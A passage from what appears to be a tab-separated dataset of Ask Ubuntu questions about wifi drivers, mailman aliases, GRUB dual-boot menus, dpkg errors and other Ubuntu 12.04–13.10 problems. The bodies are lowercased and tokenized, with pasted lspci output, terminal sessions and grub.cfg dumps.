: pci @ 0000:02:00.0 version : 73 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : b0500000-b0501fff lspci : 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 07 ) subsystem : dell device 05e9 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 60 region 0 : i/o ports at 3000 [ size=256 ] region 2 : memory at b0600000 ( 64-bit , non-prefetchable ) [ size=4k ] region 4 : memory at b0400000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 kernel modules : r8169 00 : ec 10 36 81 07 04 10 00 07 00 00 02 10 00 00 00 10 : 01 30 00 00 00 00 00 00 04 00 60 b0 00 00 00 00 20 : 0c 00 40 b0 00 00 00 00 00 00 00 00 28 10 e9 05 30 : 00 00 00 00 40 00 00 00 00 00 00 00 0b 01 00 00 02:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) subsystem : intel corporation wireless-n 7260 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 10 region 0 : memory at b0500000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel modules : wl 00 : 86 80 b1 08 06 00 10 00 73 00 80 02 10 00 00 00 10 : 04 00 50 b0 00 00 00 00 00 00 00 00 00 00 00 00 20 : 00 00 00 00 00 00 00 00 00 00 00 00 86 80 62 44 30 : 00 00 00 00 c8 00 00 00 00 00 00 00 0a 01 00 00 rfkill list all : debkumar @ debkumarubuntu : ~ $ rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no i have also tried to load firmware as suggested by the following thread , but only disappointment . no wireless for intel corporation 7260 version 63 i appreciate any suggestion in this regard !
400846	how can i back up ubuntu and restore after the installation of windows 8 ?	i have ubuntu in a whole partition of 500 gb , and i need to install windows 8 . can i back up the ubuntu 13.10 and save it some other external hdd ? i want format whole drive and again do some partitions and install windows 8 . then i need to restore ubuntu to a 50gb volume . is that possible ?
400848	genaliases for mailman	when the mailman guide writes to : then add mailman aliases in /etc/aliases do they mean /etc/aliases , or , perhaps , do they perhaps mean /var/lib/mailman/data/aliases.db ? thufir @ dur : ~ $ sudo /usr/lib/mailman/bin/genaliases [ sudo ] password for thufir : to finish creating your mailing list , you must edit your /etc/aliases ( or equivalent ) file by adding the following lines , and possibly running the `newaliases ' program : # # mailman mailing list mailman : `` |/var/lib/mailman/mail/mailman post mailman '' mailman-admin : `` |/var/lib/mailman/mail/mailman admin mailman '' mailman-bounces : `` |/var/lib/mailman/mail/mailman bounces mailman '' mailman-confirm : `` |/var/lib/mailman/mail/mailman confirm mailman '' mailman-join : `` |/var/lib/mailman/mail/mailman join mailman '' mailman-leave : `` |/var/lib/mailman/mail/mailman leave mailman '' mailman-owner : `` |/var/lib/mailman/mail/mailman owner mailman '' mailman-request : `` |/var/lib/mailman/mail/mailman request mailman '' mailman-subscribe : `` |/var/lib/mailman/mail/mailman subscribe mailman '' mailman-unsubscribe : `` |/var/lib/mailman/mail/mailman unsubscribe mailman '' thufir @ dur : ~ $ nl /var/lib/mailman/data/aliases.db nl : /var/lib/mailman/data/aliases.db : no such file or directory thufir @ dur : ~ $ thufir @ dur : ~ $ thufir @ dur : ~ $ thufir @ dur : ~ $ ll /var/lib/mailman/data/ total 28 drwxrwsr-x 2 root list 4096 jan 5 14:14 ./ drwxrwsr-x 8 root list 4096 jan 5 14:13 ../ -rw-rw-r -- 1 root list 10 jan 5 14:14 last_mailman_version -rw-r -- r -- 1 root list 14100 aug 21 02:15 sitelist.cfg thufir @ dur : ~ $ thufir @ dur : ~ $ sudo touch /var/lib/mailman/data/aliases thufir @ dur : ~ $ thufir @ dur : ~ $ sudo postalias /var/lib/mailman/data/aliases thufir @ dur : ~ $ thufir @ dur : ~ $ ll /var/lib/mailman/data/ total 40 drwxrwsr-x 2 root list 4096 jan 5 21:50 ./ drwxrwsr-x 8 root list 4096 jan 5 14:13 ../ -rw-r -- r -- 1 root list 0 jan 5 21:50 aliases -rw-r -- r -- 1 root list 12288 jan 5 21:50 aliases.db -rw-rw-r -- 1 root list 10 jan 5 14:14 last_mailman_version -rw-r -- r -- 1 root list 14100 aug 21 02:15 sitelist.cfg thufir @ dur : ~ $ i 'm not quite sure which aliases the guide mean . i think aliases.db seems more likely .
400851	13.10 booting problem	i 've installed ubuntu 13.10m ( oem ) onto a system from a usb flash drive but can not seem to boot without the drive plugged in . when i boot with the drive plugged in , my only options are to install ubuntu or start the os without installing , how do i set up the system to boot from the hard disk using the os i installed ?
400852	display pid ( process id ) on application title bar	i am using eclipse ide for application development . some times this ide will not respond and i need to kill this by opening gnome-system-monitor and pressing end process button . i know that we can kill any process by using the command kill < pid > but it is difficult to find out the process id for eclipse or any other gui application quickly . is it possible to display the process id of each gui application on the title bar . is there any settings to show process id of gui application on there title bar ?
400854	screen flickers every few seconds in ubuntu 12.10	i recently got a nice big monitor for my computer running ubuntu 12.10 & when i changed over from the old screen it started flickering very few seconds - anyone know why & what i can do to stop it ? thanks
400856	dhcp configuration in ubuntu server 12.04 lts	i know i can configure dhcp in terminal by installing isc-dhcp-server but what i need is the best gui program that allow me to configure dhcp settings graphically . any suggestion is thankful ?
400857	please help me compile a wifi driver for 13.10	no wifi in ubuntu 13.10 . i have read the read me file on the install cd and have no idea what it wants me to do . i have no experience with ubuntu or anything like it . need someone to walk me through everything please ! duel boot windows 7 ubuntu 13.10 kernel 3.11 on : msi z87-g43 motherboard intell i7 processor 16g ram nvidia geforce gtx graphics card asus pce-n53 pci-e adapter duel band wireless n600 wireless card .
400858	how to configure sftp to login in the `` / '' directory ?	i want to login as root and make the / as the default directory in sftp . newbie help needed
400859	( gedit:28533 ) : eggsmclient-warning ** : failed to connect to the session manager : none of the authentication protocols specified are supported	whenever i run gedit in ubuntu 12.04 terminal i get the following error ; root @ heena : / # gedit boot.txt ** ( gedit:28533 ) : warning ** : the connection is closed ( gedit:28533 ) : eggsmclient-warning ** : failed to connect to the session manager : none of the authentication protocols specified are supported ** ( gedit:28533 ) : warning ** : could not connect to session bus root @ heena : / # what is the number 28533 here ? and how do i solve this issue ?
400860	how to : install arm cross compilation for gcc4.8 in ubuntu 12.04	first off , i 'm new to linux and have installed ubuntu 12.04 as a vm to compile code to an arm dev . kit . since only the 12.04 version is supported on the dev . kit i 'm unable to install e.g . latest ubuntu or another distribution . my code uses parts of c++11 and i need to use gcc4.8 , which is installed and working . however , when i try to get the package for the cross-compiler gcc-4.8-armhf-cross , i get an error . i 'm quite sure it is the one linked from here : https : //launchpad.net/ubuntu/+source/gcc-4.8-armhf-cross i usually just use 'sudo apt-get package ' , which has worked well for now . but , i ca n't get this package , or i get errors on missing dependencies when in the aptitude console program . i would appreciate if someone can explain what i 'm doing wrong and how to do it correctly ? thanks in advance henrik
400862	display error after installing ubuntu 12.04 32bit on a 64bit machine	i need to install specifically like this : ubuntu 12.04 32bit on a 64bit machine . it worked perfectly on 32bit laptop . but with ubuntu 12.04 32bit on a 64bit machine i ca n't see anything without some bunch of colors on the display of the 64bit machine .
400863	hp pavilion 15 pre-installed ubuntu 12.04 - unable to install ubuntu 12.10	i have purchased hp pavilion 15 pre-installed ubuntu 12.04 ( 64 bit ) and i want to install ubuntu 12.10 from a live usb , but it does not install another ubuntu version .
400864	hp laptop screen fails to return after sleep	i am using an hp laptop that originally came with windows 8 installed . i replaced windows with ubuntu 13.10 and , for the most part it works fine ( but i suppose after windows 8 , even a cardboard box would be a better alternative ) , but when i close the laptop and reopen it , the keyboard lights come on , but the screen screen does n't resume . i have read other posts which said to increase the swap size , so i doubled it ( from 3682mib , where the default install put it , to 7364mib ) , but the problem however persists . i can not seem to find a post with a solution that works for me . when i boot my computer up , after i log in , i am bombarded with about 15 report error boxes as well . at the very least , could i disable sleep mode ( or is it suspend ? ) from occurring upon laptop closure ?
400865	how to install exfat-nofuse ?	has anybody of you tried to install exfat-nofuse . i am not sure how to install it . compile it as a module , or recompile my kernel ? ... also , do i have to recompile it after every kernel update ? will it be included in the kernel in the future ?
400868	dislplay as icon option is missing in libreoffice	how can i get `` display as icon '' in libreoffice while creating ole object in ubuntu as well as windows . please reply anyone . regards , afreen bano
400872	ca n't boot computer running ubuntu 12.04	i have a desktop computer that runs ubuntu 12.04 . this morning when i tried to boot it , it went to a black screen with the following errors : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.0 for servername *starting web server apache2 ok *checking battery state ok grub-editenv : error : can not write to the file /boot/grubenv.new please help , since i do n't know how to solve this problem , and i can not even start the terminal
400874	how to install grub on this system	i have two hard disk drives , as shown in the screenshot first hdd ( sda ) is a mbr disk and second hdd ( sdb ) is a gpt disk ( which has windows 8.1x64 ) . i have installed ubuntu on sda4 disk and windows 8.1 on sdb4 . i need to setup grub to boot both windows and ubuntu oses with efi capable mode ( my motherboard is intel dh77kc and it has uefi bios ) i tried to install grub and search for windows 8 but it does n't detect win8 , also the windows 8 disk is inaccessible on ubuntu ... i have to disable efi mode so i can boot grub before it automatically boots up windows 8 ... but without efi mode , win 8 does n't boot , so i need to install grub on efi support without re-installing ubuntu . is it possible ? only windows 8 is on efi mode , windows 7 is mbr mode .
400875	overactive fan on dell inspiron 15r	i 've noticed that the fan on my dell inspiron 15r is working constantly when using ubuntu 13.10 . it 's not a heating problem ; my computer is cool . it has an ati graphics card . any idea how to fix this ?
400876	how to solve dpkg : warning : 'tar ' not found in path or not executable	i tried your solution but still the same problem exist . gaja @ gaja-system-product-name : ~ $ sudo su [ sudo ] password for gaja : root @ gaja-system-product-name : /home/gaja # sudo apt-get install apache2 reading package lists ... done building dependency tree reading state information ... done apache2 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 230 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : warning : 'tar ' not found in path or not executable dpkg : error : 1 expected program not found in path or not executable note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin e : sub-process /usr/bin/dpkg returned an error code ( 2 ) root @ gaja-system-product-name : /home/gaja #
400879	how can i view last installed package or program ?	can user list last installed packages by apt-get in terminal ? i need to know which last package i installed on ubuntu 12.04 .
400886	how can i add a new operating system boot entry to the grub2 menu ?	i 'm pretty new to linux , but over the past few days i 've taken it upon myself to give it a shot . i 'm trying a few different distributions just to kind of get a feel for different versions , and this is the only thing that 's really got me hung up . i started with windows 7 , then i installed ubuntu 13.10 ( which works perfectly ) , and then i installed linux mint . however , i do n't have a way to boot linux mint , and that 's what i 'd like to accomplish . my goal is to have a linux mint menu entry on the grub2 menu that appears on startup to goes along with the ubuntu and windows 7 menu entries ( and a few others that i have yet to use , like the advanced ubuntu options submenu , and the memtest menu entry ) . in case any of this information is needed , here 's some information from the gparted partition table , as well as parts of the bootinfoscript output : partitions info and descriptions taken from gparted : /dev/sda1 is a 101.94 mib primary partition with fat16 file system with a flag of `` diag '' /dev/sda2 is a 11.29 gib primary partition with ntfs file system with a flag of `` boot '' and a label of `` recovery . '' according to /boot/grub/grub.cfg , this is where the windows 7 loader resides . i have no issues booting into windows 7 from the current grub2 menu . /dev/sda3 is a 275.12 gib primary partition with ntfs file system with a label of `` os . '' this partition holds all of my files that were originally made on windows , though some have been saved over using ubuntu programs ( nothing went wrong editing files across operating systems so far but let me know if this is bad for whatever reason ) . /dev/sda4 is a 171.01 gib extended partition . this partition is currently mounted . this contains the swap partition , in addition to logical partitions for the ubuntu 13.10 and linux mint 16 : /dev/sda5 is a 58.79 gib logical partition with ext4 file system , which contains the installation of linux mint 16 . in gparted , it says the mount point for this file system is / . this is the only partition that has a non-empty mount point entry . i do n't know what to make of that , and i also currently do not know of a way to boot linux mint 16 as it currently resides . /dev/sda6 is a 19.56 gib partition ( i believe it 's considered primary ? ) with `` linux-swap '' file system . this was created automatically when i installed ubuntu , but i increased its size manually by about 10 gb when i was having a few issues trying to install linux mint 16 . linux mint 16 is currently successfully installed as far as i can tell , but i do n't know how to boot into it like i said before . this partition is currently mounted . /dev/sda7 is a 36.41 gib logical partition with ext4 file system , which contains ubuntu 13.10 . ubuntu 13.10 works quite well , and it 's what i 'm currently writing this question in . this partition is currently mounted . here is the bootinfoscript output ( it 's quite long , and includes the grub.cfg file as well as the sudo fdisk -l info already posted here - some had to be omitted due to character limitations , however ) : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 94 for . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdb . sda1 : __________________________________________________________________________ file system : vfat boot sector type : dell utility : fat16 boot sector info : no errors found in the boot parameter block . operating system : boot files : /dellbio.bin /dellrmk.bin /command.com sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe /ubuntu/winboot/wubildr /ubuntu/winboot/wubildr.mbr sda4 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 13.10 boot files : /boot/grub/grub.cfg /etc/fstab sda6 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sda7 : __________________________________________________________________________ file system : ext4 boot sector type : grub2 ( v1.99 ) boot sector info : grub2 ( v1.99 ) is installed in the boot sector of sda7 and looks at sector 648107560 of the same hard drive for core.img . core.img is at this location and looks in partition 94 for . operating system : linux mint 16 petra boot files : /boot/grub/grub.cfg /etc/fstab ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 63 208,844 208,782 de dell utility /dev/sda2 * 212,992 41,172,991 40,960,000 7 ntfs / exfat / hpfs /dev/sda3 41,172,992 618,134,175 576,961,184 7 ntfs / exfat / hpfs /dev/sda4 618,139,646 976,771,071 358,631,426 5 extended /dev/sda5 694,501,376 817,790,975 123,289,600 83 linux /dev/sda6 935,753,728 976,771,071 41,017,344 82 linux swap / solaris /dev/sda7 618,139,648 694,499,022 76,359,375 83 linux '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 3030-3030 vfat dellutility /dev/sda2 76c2ad13c2acd89f ntfs recovery /dev/sda3 b864ae8864ae4948 ntfs os /dev/sda5 5832ede3-f357-427e-ac67-b2157b5ba6e1 ext4 /dev/sda6 24a1b8d2-d3a0-4b3f-b48e-9a3f5bab16c2 swap /dev/sda7 520dfeb8-758e-47c0-97de-a0a8cb8b4866 ext4 ================================ mount points : ================================= device mount_point type options /dev/sda3 /media/matt/os fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda5 / ext4 ( rw , errors=remount-ro ) /dev/sda7 /media/matt/520dfeb8-758e-47c0-97de-a0a8cb8b4866 ext4 ( rw , nosuid , nodev , uhelper=udisks2 ) =========================== sda5/boot/grub/grub.cfg : =========================== bootinfoscript -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 5832ede3-f357-427e-ac67-b2157b5ba6e1 else search -- no-floppy -- fs-uuid -- set=root 5832ede3-f357-427e-ac67-b2157b5ba6e1 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # /\/\/\/\/\ edited out more theme info /\/\/\/\/\/\ # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-5832ede3-f357-427e-ac67-b2157b5ba6e1 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 5832ede3-f357-427e-ac67-b2157b5ba6e1 else search -- no-floppy -- fs-uuid -- set=root 5832ede3-f357-427e-ac67-b2157b5ba6e1 fi linux /boot/vmlinuz-3.11.0-15-generic root=uuid=5832ede3-f357-427e-ac67-b2157b5ba6e1 ro acpi_backlight=vendor dell_laptop.backlight=0 quiet splash $ vt_handoff initrd /boot/initrd.img-3.11.0-15-generic } /\/\/\/\/\/\/\/ i manually omitted the ubuntu advanced options submenu from here because there was > 30000 characters /\/\/\/\/\/\/ -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-35-generic-advanced-5832ede3-f357-427e-ac67-b2157b5ba6e1 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 5832ede3-f357-427e-ac67-b2157b5ba6e1 else search -- no-floppy -- fs-uuid -- set=root 5832ede3-f357-427e-ac67-b2157b5ba6e1 fi echo 'loading linux 3.8.0-35-generic ... ' linux /boot/vmlinuz-3.8.0-35-generic root=uuid=5832ede3-f357-427e-ac67-b2157b5ba6e1 ro acpi_backlight=vendor dell_laptop.backlight=0 quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-35-generic } menuentry 'ubuntu , with linux 3.8.0-35-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-35-generic-recovery-5832ede3-f357-427e-ac67-b2157b5ba6e1 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 5832ede3-f357-427e-ac67-b2157b5ba6e1 else search -- no-floppy -- fs-uuid -- set=root 5832ede3-f357-427e-ac67-b2157b5ba6e1 fi echo 'loading linux 3.8.0-35-generic ... ' linux /boot/vmlinuz-3.8.0-35-generic root=uuid=5832ede3-f357-427e-ac67-b2157b5ba6e1 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-35-generic } menuentry 'ubuntu , with linux 3.8.0-19-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-19-generic-advanced-5832ede3-f357-427e-ac67-b2157b5ba6e1 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 5832ede3-f357-427e-ac67-b2157b5ba6e1 else search -- no-floppy -- fs-uuid -- set=root 5832ede3-f357-427e-ac67-b2157b5ba6e1 fi echo 'loading linux 3.8.0-19-generic ... ' linux /boot/vmlinuz-3.8.0-19-generic root=uuid=5832ede3-f357-427e-ac67-b2157b5ba6e1 ro acpi_backlight=vendor dell_laptop.backlight=0 quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-19-generic } menuentry 'ubuntu , with linux 3.8.0-19-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-19-generic-recovery-5832ede3-f357-427e-ac67-b2157b5ba6e1 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 5832ede3-f357-427e-ac67-b2157b5ba6e1 else search -- no-floppy -- fs-uuid -- set=root 5832ede3-f357-427e-ac67-b2157b5ba6e1 fi echo 'loading linux 3.8.0-19-generic ... ' linux /boot/vmlinuz-3.8.0-19-generic root=uuid=5832ede3-f357-427e-ac67-b2157b5ba6e1 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-19-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry 'memory test ( memtest86+ ) ' { insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 5832ede3-f357-427e-ac67-b2157b5ba6e1 else search -- no-floppy -- fs-uuid -- set=root 5832ede3-f357-427e-ac67-b2157b5ba6e1 fi linux16 /boot/memtest86+.bin } menuentry 'memory test ( memtest86+ , serial console 115200 ) ' { insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 5832ede3-f357-427e-ac67-b2157b5ba6e1 else search -- no-floppy -- fs-uuid -- set=root 5832ede3-f357-427e-ac67-b2157b5ba6e1 fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry 'windows 7 ( loader ) ( on /dev/sda2 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-76c2ad13c2acd89f ' { insmod part_msdos insmod ntfs set root='hd0 , msdos2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos2 -- hint-efi=hd0 , msdos2 -- hint-baremetal=ahci0 , msdos2 76c2ad13c2acd89f else search -- no-floppy -- fs-uuid -- set=root 76c2ad13c2acd89f fi chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda5/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sdb5 during installation uuid=5832ede3-f357-427e-ac67-b2157b5ba6e1 / ext4 errors=remount-ro 0 1 # swap was on /dev/sdb6 during installation uuid=24a1b8d2-d3a0-4b3f-b48e-9a3f5bab16c2 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =========================== sda7/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos7' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos7 -- hint-efi=hd0 , msdos7 -- hint-baremetal=ahci0 , msdos7 520dfeb8-758e-47c0-97de-a0a8cb8b4866 else search -- no-floppy -- fs-uuid -- set=root 520dfeb8-758e-47c0-97de-a0a8cb8b4866 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # /\/\/\/\/\/\/ edited out some debian/mint theme info here /\/\/\/\/\/\/\ # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ 1 '' if [ `` $ 1 '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'linux mint 16 cinnamon 64-bit , 3.11.0-12-generic ( /dev/sda7 ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos7' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos7 -- hint-efi=hd0 , msdos7 -- hint-baremetal=ahci0 , msdos7 